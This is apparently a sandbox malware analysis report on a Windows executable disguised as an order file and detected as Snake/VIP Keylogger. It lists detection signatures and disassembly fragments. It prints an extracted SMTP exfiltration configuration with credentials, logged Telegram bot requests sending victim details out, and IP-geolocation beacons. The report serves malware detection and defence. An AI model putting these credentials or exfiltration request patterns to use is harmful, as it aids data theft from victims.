Windows Analysis Report
NEW FRANCE ORDER.exe

Overview

General Information

Sample name: NEW FRANCE ORDER.exe
Analysis ID: 1650501
MD5: c42c3d3b8cd09debfbeb4917845bfc1c
SHA1: 2894802c2848c43d9ac6833b614ca38f870c02d5
SHA256: 0934fbe06034dbe5749eaaa72e57016b04ae3fc9b66cc8984815ebd3148b1626
Tags: exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: NEW FRANCE ORDER.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Avira: detection malicious, Label: HEUR/AGEN.1310705
Found malware configuration
Source: 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "bank@iaa-airferight.com", "Password": "moneyismade22", "Host": "mail.iaa-airferight.com", "Port": "25"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe ReversingLabs: Detection: 66%
Multi AV Scanner detection for submitted file
Source: NEW FRANCE ORDER.exe Virustotal: Detection: 56% Perma Link
Source: NEW FRANCE ORDER.exe ReversingLabs: Detection: 66%
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Neural Call Log Analysis: 100.0%
Sample uses string decryption to hide its real strings
Source: 10.2.IsSingleByte.exe.401a820.0.unpack String decryptor: bank@iaa-airferight.com
Source: 10.2.IsSingleByte.exe.401a820.0.unpack String decryptor: moneyismade22
Source: 10.2.IsSingleByte.exe.401a820.0.unpack String decryptor: mail.iaa-airferight.com
Source: 10.2.IsSingleByte.exe.401a820.0.unpack String decryptor: 25
Source: 10.2.IsSingleByte.exe.401a820.0.unpack String decryptor:

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: NEW FRANCE ORDER.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49722 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49743 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: NEW FRANCE ORDER.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1303196281.00000000066C0000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.00000000046E4000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003F7C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1303196281.00000000066C0000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.00000000046E4000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003F7C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: NEW FRANCE ORDER.exe, 00000000.00000002.1302840709.0000000006670000.00000004.08000000.00040000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, NEW FRANCE ORDER.exe, 00000000.00000002.1297862990.000000000467E000.00000004.00000800.00020000.00000000.sdmp, IsSingleByte.exe, 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 4x nop then jmp 05DD8878h 0_2_05DD87C0
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 4x nop then jmp 05DD8878h 0_2_05DD87B9
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 4x nop then jmp 065F70BBh 0_2_065F7081
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 4x nop then jmp 065F70BBh 0_2_065F6E10
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 4x nop then jmp 065F70BBh 0_2_065F6DC0
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 4x nop then jmp 065F0AE4h 0_2_065F0A70
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Code function: 4x nop then jmp 065F0AE4h 0_2_065F0A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 7_2_01506268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 7_2_01506DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0198F5BDh 7_2_0198F420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0198F5BDh 7_2_0198F68F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0198F5BDh 7_2_0198F60C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0198FDA0h 7_2_0198FAC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E394A9h 7_2_05E391B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E38189h 7_2_05E37E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E330B0h 7_2_05E32DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E310C0h 7_2_05E30DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E36878h 7_2_05E365A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3C479h 7_2_05E3C180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E35068h 7_2_05E34D98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3AC91h 7_2_05E3A998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E30C30h 7_2_05E30960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3DC61h 7_2_05E3D968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E32C20h 7_2_05E32950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3F449h 7_2_05E3F150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E34BD8h 7_2_05E34908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E38FE1h 7_2_05E38CE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E32790h 7_2_05E324C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E307A0h 7_2_05E304D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3A7C9h 7_2_05E3A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3D799h 7_2_05E3D4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3BFB1h 7_2_05E3BCB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3EF81h 7_2_05E3EC88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E34748h 7_2_05E34478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E30310h 7_2_05E30040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E38B19h 7_2_05E38820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E32300h 7_2_05E32030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3A301h 7_2_05E3A008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E342B8h 7_2_05E33FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E37B59h 7_2_05E377E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3BAE9h 7_2_05E3B7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3EAB9h 7_2_05E3E7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E362AAh 7_2_05E35FD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3D2D1h 7_2_05E3CFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E31E70h 7_2_05E31BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E39E39h 7_2_05E39B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E35E18h 7_2_05E35B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E33E28h 7_2_05E33B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E37628h 7_2_05E37358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E38651h 7_2_05E38358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3B621h 7_2_05E3B328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E319E0h 7_2_05E31710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3CE09h 7_2_05E3CB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3FDD9h 7_2_05E3FAE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3E5F1h 7_2_05E3E2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E33998h 7_2_05E336C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E37198h 7_2_05E36EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E35988h 7_2_05E356B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E31550h 7_2_05E31280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3B159h 7_2_05E3AE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E33518h 7_2_05E33270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E39971h 7_2_05E39678
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3C941h 7_2_05E3C648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E354F8h 7_2_05E35228
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3E129h 7_2_05E3DE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E36D08h 7_2_05E36A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05E3F911h 7_2_05E3F618
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 4x nop then jmp 05907268h 10_2_059071B0
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 4x nop then jmp 05907268h 10_2_059071A9
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 10_2_060ED7C8
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 4x nop then jmp 061370BBh 10_2_06137081
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 4x nop then jmp 061370BBh 10_2_06136E10
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 4x nop then jmp 061370BBh 10_2_06136DC0
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 4x nop then jmp 06130AE4h 10_2_06130A70
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Code function: 4x nop then jmp 06130AE4h 10_2_06130A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 11_2_010D6EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 11_2_010D5D68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0150F45Dh 11_2_0150F2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0150F45Dh 11_2_0150F4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0150FC40h 11_2_0150F961

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49740 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49760 -> 149.154.167.220:443
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20and%20Time:%2027/03/2025%20/%2022:36:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20928100%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20and%20Time:%2027/03/2025%20/%2021:07:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20928100%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 46.175.148.58 46.175.148.58
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49745 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49726 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49747 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49717 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49724 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49727 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 104.21.48.1:443
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.4:49741 -> 46.175.148.58:25
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49722 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49743 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
